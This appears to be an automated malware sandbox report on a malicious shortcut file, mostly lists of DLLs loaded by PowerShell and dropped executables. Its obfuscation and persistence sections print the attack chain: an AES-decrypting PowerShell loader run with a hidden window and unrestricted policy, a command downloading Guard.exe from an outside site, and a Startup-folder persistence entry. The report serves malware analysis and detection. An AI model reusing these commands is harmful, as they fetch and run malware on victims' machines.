Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeSection loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeSection loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Guard.exeSection loaded: version.dll
Source: C:\Users\Public\Guard.exeSection loaded: winmm.dll
Source: C:\Users\Public\Guard.exeSection loaded: mpr.dll
Source: C:\Users\Public\Guard.exeSection loaded: wininet.dll
Source: C:\Users\Public\Guard.exeSection loaded: iphlpapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: userenv.dll
Source: C:\Users\Public\Guard.exeSection loaded: uxtheme.dll
Source: C:\Users\Public\Guard.exeSection loaded: kernel.appcore.dll
Source: C:\Users\Public\Guard.exeSection loaded: windows.storage.dll
Source: C:\Users\Public\Guard.exeSection loaded: wldp.dll
Source: C:\Users\Public\Guard.exeSection loaded: napinsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: pnrpnsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wshbth.dll
Source: C:\Users\Public\Guard.exeSection loaded: nlaapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Guard.exeSection loaded: dnsapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: winrnr.dll
Source: C:\Users\Public\Guard.exeSection loaded: rasadhlp.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: twext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dll
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: version.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: rasadhlp.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: lKin1m7Pf2.lnk | LNK file: ..\..\..\..\Windows\System32\Wbem\wmic.exe
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000006.00000003.1528320950.0000024648EE8000.00000004.00000020.00020000.00000000.sdmp, duychuan1[1].6.dr
Source: Binary string: sethc.pdb source: duychuan1[1].6.dr

Data Obfuscation

Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function tKQ ($VNRiPvLz){return -split ($VNRiPvLz -replace '..', '0x$& ')};$YYRv = tKQ($ddg.SubString(0, 2016));$Pks = [System.Security.Cryptography.Aes]::Create();$Pks.Key = tKQ($ddg.SubString(2016));$Pks.IV = New-Object byte[] 16;$udeEb = $Pks.CreateDecryptor();$fBRzq = [System.String]::new($udeEb.TransformFinalBlock($YYRv, 0,$YYRv.Length)); sal fd $fBRzq.Substring(3,3); fd $fBRzq.Substring(6)
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kfSlwlO" -OutFile "C:\Users\Public\Guard.exe""
Source: duychuan1[1].6.dr | Static PE information: 0xDA18FDB4 [Thu Dec 13 08:35:00 2085 UTC]
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe | Code function: 16_2_00007FF656077634 LoadLibraryA,GetProcAddress,16_2_00007FF656077634
Source: duychuan1[1].6.dr | Static PE information: real checksum: 0x20826 should be: 0x6dea4
Source: duychuan1[1].6.dr | Static PE information: section name: .didat
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe | Code function: 16_2_00007FF6560178FD push rdi; ret 16_2_00007FF656017904
Source: C:\Users\user\AppData\Roaming\BnQwAP.exe | Code function: 16_2_00007FF656017399 push rdi; ret 16_2_00007FF6560173A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_00007FFB498100BD pushad ; iretd 21_2_00007FFB498100C1

Persistence and Installation Behavior

Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file | Process created: C:\Windows\System32\mshta.exe
Source: LNK file | Process created: C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Users\Public\Guard.exe | File created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
Source: C:\Windows\System32\mshta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\duychuan1[1]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\Guard.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\BnQwAP.exe

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656004514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,16_2_00007FF656004514
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1474
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1264
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1200
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 558
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5108
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4633
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6170
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1800
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4527
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4261
Source: C:\Windows\System32\mshta.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\duychuan1[1]
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeAPI coverage: 3.8 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5160Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 352Thread sleep count: 1200 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 356Thread sleep count: 558 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5884Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5376Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3904Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep count: 6170 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep count: 1800 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7688Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8120Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8128Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532Thread sleep count: 4527 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7748Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532Thread sleep count: 4261 > 30
